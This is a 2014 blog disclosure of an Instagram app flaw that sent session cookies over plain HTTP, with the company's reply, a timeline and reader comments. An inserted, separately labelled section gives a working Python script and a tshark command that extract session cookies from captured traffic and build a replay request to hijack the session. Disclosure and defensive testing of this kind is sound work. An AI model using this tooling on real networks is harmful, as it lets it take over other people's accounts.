Saturday, July 26, 2014

Session Hijacking in Instagram Mobile App via MITM Attack [ 0-DAY ]




In this post I am going to share a new critical issue that I identified in the Instagram mobile app. To pentest the Android app I set up a lab: I used the app on my phone while monitoring the network traffic with Wireshark, looking for data that crosses the network unencrypted, or for a technique to make that data readable if it was encrypted. As soon as I logged into my account on the phone, Wireshark captured unencrypted data going over plain HTTP. This data included the pictures the victim is viewing, the victim's session cookies, and the victim's username and user ID. Because it is plain HTTP, anyone positioned on the network path (the same open Wi-Fi network, a rogue access point, or the ISP) can read it passively; no certificate tricks or active interception are needed.



I was shocked after seeing the results. It is hard to believe that Facebook, the company responsible for Instagram, did not ensure that this data is secured and sent over HTTPS.


Then I took the session cookies, used them from my computer, and simply: the victim's session was hijacked. This works because the server identifies the session by the cookie value alone, so whoever holds a copy of that value is the user as far as the server is concerned.
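The capture-and-replay procedure above, as an added example that is not code from the original post: a small Python script that scans reassembled HTTP messages the way a passive sniffer on the same network would, flags session-like cookies sent over plain HTTP (and responses that set such cookies without the Secure attribute), and builds the replayed request that reuses one of them. The host names, cookie names and values in the sample capture are constructed, and the regex used to decide what counts as a "session-like" cookie name is an assumption to tune for the app under test.

```python
import re
from dataclasses import dataclass

# Assumption of this example: cookie names matching this pattern are treated
# as session-bearing. Real apps use their own names; tune it per target.
SESSION_LIKE = re.compile(r"sess|token|auth|user_?id", re.IGNORECASE)


@dataclass(frozen=True)
class Packet:
    """One reassembled HTTP message as a passive observer sees it."""
    src: str        # "ip:port" of the sender
    dst: str        # "ip:port" of the receiver
    payload: bytes  # raw HTTP message; only the head is parsed here

    @property
    def src_port(self) -> int:
        return int(self.src.rsplit(":", 1)[1])

    @property
    def dst_port(self) -> int:
        return int(self.dst.rsplit(":", 1)[1])


def parse_http_head(payload: bytes):
    """Return (start line, header map). Names are lower-cased; values are
    kept as lists because Set-Cookie is routinely repeated."""
    lines = payload.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def parse_cookie_header(value: str) -> dict:
    """Client Cookie header: 'a=1; b=2' -> {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = val.strip()
    return cookies


def parse_set_cookie(value: str):
    """Server Set-Cookie: 'sid=abc; Path=/; HttpOnly' ->
    ('sid', 'abc', {'path', 'httponly'}) with attribute names lower-cased."""
    parts = [p.strip() for p in value.split(";")]
    name, _, val = parts[0].partition("=")
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    return name.strip(), val.strip(), attrs


def find_cleartext_session_cookies(packets):
    """Flag session-like cookies a sniffer on the path could read.
    Port 443 traffic is skipped: it is inside TLS and opaque to the observer."""
    findings = []
    for pkt in packets:
        if pkt.dst_port == 80:                        # client -> server
            start, headers = parse_http_head(pkt.payload)
            host = headers.get("host", ["?"])[0]
            for raw in headers.get("cookie", []):
                for name, val in parse_cookie_header(raw).items():
                    if SESSION_LIKE.search(name):
                        findings.append({"kind": "cookie_sent_over_http",
                                         "host": host, "request": start,
                                         "cookie": name, "value": val,
                                         "client": pkt.src})
        elif pkt.src_port == 80:                      # server -> client
            _, headers = parse_http_head(pkt.payload)
            for raw in headers.get("set-cookie", []):
                name, val, attrs = parse_set_cookie(raw)
                if SESSION_LIKE.search(name) and "secure" not in attrs:
                    # Without Secure the client will keep sending it over HTTP.
                    findings.append({"kind": "set_cookie_without_secure",
                                     "cookie": name, "value": val,
                                     "server": pkt.src})
    return findings


def build_replay_request(finding, path="/") -> bytes:
    """The hijack step: a request sent from another machine that reuses the
    captured cookie value unchanged."""
    return (f"GET {path} HTTP/1.1\r\nHost: {finding['host']}\r\n"
            f"Cookie: {finding['cookie']}={finding['value']}\r\n"
            f"Connection: close\r\n\r\n").encode()


# Constructed sample capture: hypothetical hosts, cookie names and values.
SAMPLE_CAPTURE = [
    Packet("10.0.0.5:51234", "203.0.113.10:80",
           b"GET /api/v1/feed/timeline/ HTTP/1.1\r\n"
           b"Host: api.example-app.invalid\r\n"
           b"Cookie: sessionid=deadbeef0001; csrftoken=abc123; lang=en\r\n\r\n"),
    Packet("203.0.113.10:80", "10.0.0.5:51234",
           b"HTTP/1.1 200 OK\r\n"
           b"Set-Cookie: sessionid=deadbeef0001; Path=/; HttpOnly\r\n"
           b"Content-Length: 0\r\n\r\n"),
    Packet("10.0.0.5:51235", "203.0.113.10:443",
           b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1"),   # TLS ClientHello: opaque
    Packet("10.0.0.5:51236", "203.0.113.10:80",
           b"GET /static/logo.png HTTP/1.1\r\nHost: img.example-app.invalid\r\n\r\n"),
]

if __name__ == "__main__":
    found = find_cleartext_session_cookies(SAMPLE_CAPTURE)
    for f in found:
        print(f)
    print(build_replay_request(found[0], "/api/v1/feed/timeline/").decode())
```

On a real capture the same first check is one tshark line, `tshark -r capture.pcap -Y 'http.cookie' -T fields -e http.host -e http.cookie`: any output at all means a cookie crossed the wire readable. The fix is on the server and app side, not the user's: every endpoint that carries a session goes over HTTPS only, the session cookie carries the Secure attribute so the client never sends it over HTTP, and the server refuses to honour a session cookie that arrives on a plain-HTTP request.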




I have reported this issue to Facebook, and they emailed me saying:



       The security member said:” Facebook accepts the risk of parts of Instagram communicating over HTTP not over HTTPS”.
Given that this unencrypted data can lead to session hijacking and to stalking of Instagram users, accepting that risk should raise an eyebrow.


Timeline:
Jul 24, 2014 4:35am – Reported the issue.
Jul 24, 2014 4:38am – Received a confirmation email that the submission was received.
Jul 24, 2014 9:45pm – Received the first response from Facebook Security.
Jul 24, 2014 9:45pm – Asked for disclosure.
Jul 24, 2014 11:56pm – Received the second response from Facebook Security.

Recommendation:
       Until a patch is released (Facebook has not given any date for one), do not use the Instagram mobile app. Instead, use the normal website, which is generally secured and encrypted. If you must use the app, at least avoid doing so on networks you do not control, such as public Wi-Fi, since that is where a passive sniffer is easiest to place.

Final Thoughts:
       It is hard to believe that a company such as Facebook does not take every measure to ensure the security of its users. Right now, I believe this issue might already be getting exploited in the wild by surveillance agencies.

     Follow me on Twitter @mazen160, and check my blog for the latest news and findings.

8 comments:

  1. Thanks for sharing, I will post it on http://www.anti-virus4u.com/ media channels.

  2. Nice work. But I think now you won't be considered for https://www.facebook.com/whitehat

    1. Unfortunately, it didn't qualify for the Fb bounty program. But it is good that everyone knows about the reality of Facebook & Instagram now.
      Thanks,
      Mazin

  3. I reported this vulnerability 3 months ago and got the same reply, and Instagram over the web is also not secured and not 100% encrypted. It's not a zero-day anyway. Great work!

    1. The Instagram web platform does not have known critical bugs, AFAIK. By a zero-day I mean that it is still unpatched and can be exploited by anyone.

      Thanks,
      Mazin

  4. Acetech is a Mobile App Development India company and also popular as Software Development India. They can be an efficient business consultant for you.

  5. I use this mobile app very often and I have never had any problems. I'm going to read more information, of course, but I like this app and never feel any discomfort.

  6. Awesome post, I really like it. Thanks for sharing this.
